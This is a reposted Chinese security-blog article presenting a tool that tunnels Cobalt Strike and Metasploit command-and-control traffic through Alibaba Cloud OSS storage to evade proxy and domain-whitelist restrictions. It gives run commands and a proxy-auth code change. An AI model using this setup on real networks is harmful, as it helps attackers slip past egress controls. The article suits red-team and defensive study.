阿里云OSS转发HTTP流量上线工具

admin
admin
admin
137989
文章
113
评论
2024年3月19日14:15:14评论40 views字数 1121阅读3分44秒阅读模式

阿里云OSS转发HTTP流量上线工具

工具简介

利用阿里云oss对象存储,来转发http流量实现(cs)Cobalt Strike、msf 上线等,这之间利用阿里云的相关域名进行通信。

应用场景

在某次攻防中,内部通过代理服务器上网,且不能访问ip,域名白名单,刚好阿里云、腾讯云在其中,看到github上有个师傅写过的一些腾讯云的代码,但是有个问题,腾讯云的官方库好像不支持认证功能,于是我就照着这个师傅的代码改成了阿里云的版本,参考:
https://github.com/9bie/oss-stinger
修改39行就好,加入内网代理服务器
ossClient, err = oss.New(endPoint, accessKeyId, accessKeySecret, oss.AuthProxy("http://127.0.0.1:8080", "", ""))

如何使用

PS C:UsersxxxDesktopgithubgoalioss-stinger> go run .main.go -hUsage of C:UsersxxxAppDataLocalTempgo-build3967568892b001exemain.exe:  -address string        监听地址或者目标地址,格式:127.0.0.1:8080  -mode string        client/server 二选一  -osskey string        format: endpoint:accessKeyId:accessKeySecret:bucketName

CobaltStrike

生成监听本地127.0.0.1:8001的木马:

阿里云OSS转发HTTP流量上线工具

服务端运行

.alioss-stinger.exe -address 127.0.0.1:8001 -mode server -osskey endpoint:accessKeyId:accessKeySecret:bucketName

客户端运行

.alioss-stinger.exe -address 127.0.0.1:8001 -mode client -osskey endpoint:accessKeyId:accessKeySecret:bucketName
阿里云OSS转发HTTP流量上线工具

阿里云安全配置

按照这个配置就可以了。

https://www.yuque.com/pantom/netsecnote/kyqg65wkmxycfhei

下载地址

https://github.com/pant0m/alioss-stinger

文章来源:Hack分享吧

黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!

如侵权请私聊我们删文

END

原文始发于微信公众号(黑白之道):阿里云OSS转发HTTP流量上线工具

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月19日14:15:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   阿里云OSS转发HTTP流量上线工具https://cn-sec.com/archives/2581927.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息